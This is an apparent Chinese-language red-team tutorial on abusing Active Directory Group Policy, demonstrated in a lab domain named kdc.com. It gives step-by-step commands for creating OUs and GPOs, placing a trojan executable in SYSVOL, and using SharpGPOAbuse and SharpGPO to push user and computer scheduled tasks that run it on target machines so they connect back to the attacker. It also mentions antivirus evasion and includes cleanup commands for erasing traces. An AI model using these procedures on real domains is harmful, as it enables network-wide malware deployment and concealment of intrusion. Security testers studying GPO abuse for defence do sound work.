参考
http://www.ttk7.cn/post-136.html
注意点
计划任务 每次需要删除计划的配置文件 ,更改任务名 重新下发文件,计划任务的文件路径放在sysvol目录下
startup 重启登录 文件必须放在 gpo配置的指定目录下
如果有修改sysvol的权限 可以尝试替换 Startup 以及 计划任务的配置文件
Gpp策略
域内的组策略,在创建gpo之后,可以设置 执行命令的功能,适用于在有适当的域控制权限针对特定目标机器进行执行命令或者批量下发命令的功能
所有的域策略保存在
SYSVOL
解决办法之一是为认证数据采取SYSVOL,SYSVOL是AD(活动目录)里面一个存储域公共文件服务器副本的共享文件夹,所有的认证用户都可以读取。SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为SYSVOL能在所有域控里进行自动同步和共享。
\<domain>\SYSVOL\<domain>\Policies\</domain></domain>
环境
dc1
windows7SYSVOL下存放的域策略配置
SYSVOL 下可能会存放密码策略,本地管理员账户,网站账户的一些策略配置,在权限拓展失败的情况下可以尝试翻阅SYSVOL下的目录可能会有域内的一些配置脚本保存信息
User (Ou组内用户登录后相关脚本进行的命令执行)
Machine (机器重启运行后相关脚本进行的命令执行)
登录域控通过域策略进行命令执行
新建OU
新建OU 添加目标机器,或者用户,这里我以受害机器 windows7 用户 zhu 进行演示
新建组织单位 信息部
将原技术部 zhu 以及用户计算机移动到Ou信息部下
运行gpmc.msc 进行组策略配置
在这个域中创建gpo 我们命名gptest
在 gptest 右键编辑
我们来设置登录脚本
这里我们以用户进行配置 -》Windows设置-》脚本登录
点击显示文件,将生成的木马 放入显示文件的目录里,然后点击添加脚本就行
组策略创建好后然后在ou右键选择链接到现有的GPO
我们在域控刷新一下域策略在windows7机器
powershell Invoke-GPUpdate -Computer windows7.kdc.com -RandomDelayInMinutes 0重启登录受害用户
计划任务执行
这种方法在组策略不需要用户重启电脑在Startup过程中执行任务,直接在运行过程中刷新组策略即可
具体方法在组策略里的用户配置-》首选项-》控制面板-》计划任务
这里就不演示了,需要注意的是执行路径,需要受害机器能够访问到
不登录进行组策略下发执行
使用工具如下
https://github.com/FSecureLABS/SharpGPOAbuse
https://github.com/Dliv3/SharpGPO具体用法参照 readme ,落地注意免杀
新建ou
SharpGpo.exe --Action NewOU --OUName "IT"
移动信息部下x用户到IT组下面
SharpGpo.exe --Action MoveObject --SrcDN "CN=x,OU=信息部,DC=kdc,DC=com" --DstDN "OU=IT,DC=kdc,DC=com"
再将Administrators电脑移动到IT组下
SharpGpo.exe --Action MoveObject --SrcDN "CN=administrator,OU=技术部,DC=kdc,DC=com" --DstDN "OU=IT,DC=kdc,DC=com"
创建GPo pergpo
SharpGpo.exe --Action NewGPO --GPOName pergpo
sysvol下会出现策略配置信息
现在我们添加一个计划任务 来使目标机器或者用户上线
由于目标机器执行计划任务是以本地文件路径执行,所以我们要把木马文件放置在 目标机器可以访问的目录,sysvol目录是域内机器都可以访问到的目录我们可以把木马放置在该目录下
\kdc.com\SysVol\kdc.com\scripts****
注:执行时需要cmd /c start否则开机会有cmd窗口
添加用户计划任务
SharpGPOAbuse.exe --AddUserTask --TaskName "tu" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c start \\dc1\\SysVol\\kdc.com\\scripts\\artifact.exe" --GPOName "pergpo"添加机器计划任务
SharpGPOAbuse.exe --AddComputerTask --TaskName "tu" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c start \\dc1\\SysVol\\kdc.com\\scripts\\artifact.exe" --GPOName "pergpo"
(注意这里 计划任务会在sysvol目录下存放一个计划任务配置的xml,每次换新的计划任务时需要删除掉此gpo下的计划配置文件。并重新下发计划任务,并重新更换任务名)
将GPlink 链接到目标ou下
SharpGpo.exe --Action NewGPLink --DN "OU=IT,DC=kdc,DC=com" --GPOName pergpo
刷新域策略上线
powershell Invoke-GPUpdate -Computer dc1.kdc.com -RandomDelayInMinutes 0
清理痕迹
删除gplink 链接
SharpGPO.exe --Action RemoveGPLink --DN "OU=IT,DC=kdc,DC=com" --GPOName pergpo
删除gpo 或者可以直接删除sysvol 目录下
SharpGPO.exe --Action RemoveGPO --GPOName pergpo移动ou 到原来目录 x administrator 科技部
SharpGpo.exe --Action MoveObject --SrcDN "CN=Administrator,OU=IT,DC=kdc,DC=com" --DstDN "OU=技术部,DC=kdc,DC=com"
删除ou IT
SharpGpo.exe --Action RemoveOU --OUName "IT"